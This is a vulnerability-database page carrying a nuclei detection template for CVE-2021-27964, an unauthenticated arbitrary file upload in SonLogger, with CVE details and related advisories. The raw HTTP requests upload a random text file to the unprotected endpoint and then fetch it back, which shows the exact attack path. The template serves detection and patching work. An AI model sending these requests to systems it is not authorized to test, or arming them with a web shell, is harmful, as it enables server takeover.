Lucene search
K

SonLogger - Arbitrary File Upload

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

Critical security vulnerability in SonLogger allows unauthenticated arbitrary file uploads.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload Exploit
15 Mar 202100:00
zdt
GithubExploit
Exploit for Missing Authentication for Critical Function in Sfcyazilim Sonlogger
26 Feb 202111:44
githubexploit
Circl
CVE-2021-27964
5 Mar 202107:47
circl
CNNVD
Sonlogger 代码问题漏洞
5 Mar 202100:00
cnnvd
Check Point Advisories
SonLogger Arbitrary File Upload (CVE-2021-27964)
24 Mar 202100:00
checkpoint_advisories
CVE
CVE-2021-27964
5 Mar 202101:37
cve
Cvelist
CVE-2021-27964
5 Mar 202101:37
cvelist
Exploit DB
SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)
15 Mar 202100:00
exploitdb
NVD
CVE-2021-27964
5 Mar 202102:15
nvd
OSV
CVE-2021-27964
5 Mar 202102:15
osv
Rows per page
id: CVE-2021-27964

info:
  name: SonLogger - Arbitrary File Upload
  author: DhiyaneshDK
  severity: critical
  description: |
    SonLogger before 6.4.1 is affected by Unauthenticated Arbitrary File Upload. An attacker can send a POST request to /Config/SaveUploadedHotspotLogoFile without any authentication or session header. There is no check for the file extension or content of the uploaded file.
  impact: |
    Unauthenticated attackers can upload malicious files without extension validation, achieving remote code execution and complete server compromise.
  remediation: |
    Upgrade to SonLogger version 6.4.1 or later.
  reference:
    - https://erberkan.github.io/2021/SonLogger-vulns/
    - https://github.com/erberkan/SonLogger-vulns
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27964
    cwe-id: CWE-434
    epss-score: 0.46021
    epss-percentile: 0.9866
    cpe: cpe:2.3:a:sfcyazilim:sonlogger:*:*:*:*:*:*:*:*
  metadata:
    vendor: sfcyazilim
    product: sonlogger
    fofa-query: body="SonLogger"
    max-request: 2
  tags: cve,cve2021,sonlogger,intrusive,vkev,vuln

flow: http(1) && http(2)

variables:
  file: "{{to_lower(rand_text_alpha(5))}}"
  rand: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywBBYcU9lVZ
        X-Requested-With: XMLHttpRequest

        ------WebKitFormBoundarywBBYcU9lVZ
        Content-Disposition: form-data; name="file"; filename="{{file}}.txt"
        Content-Type: image/png

        {{rand}}
        ------WebKitFormBoundarywBBYcU9lVZ--

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains(body, 'Message')
        condition: and
        internal: true

  - raw:
      - |
        GET /Assets/temp/hotspot/img/{{file}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, '{{rand}}')
        condition: and
# digest: 4b0a00483046022100b0a01529e14e7b4b49334bed9255d467f827d1992a2ce7c3a21abdea8ef9a4b60221008a85c6325642ef0769900e3f5cbdb7d21d8488cca4b07e7dac8aa9d1906d816e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.46021
35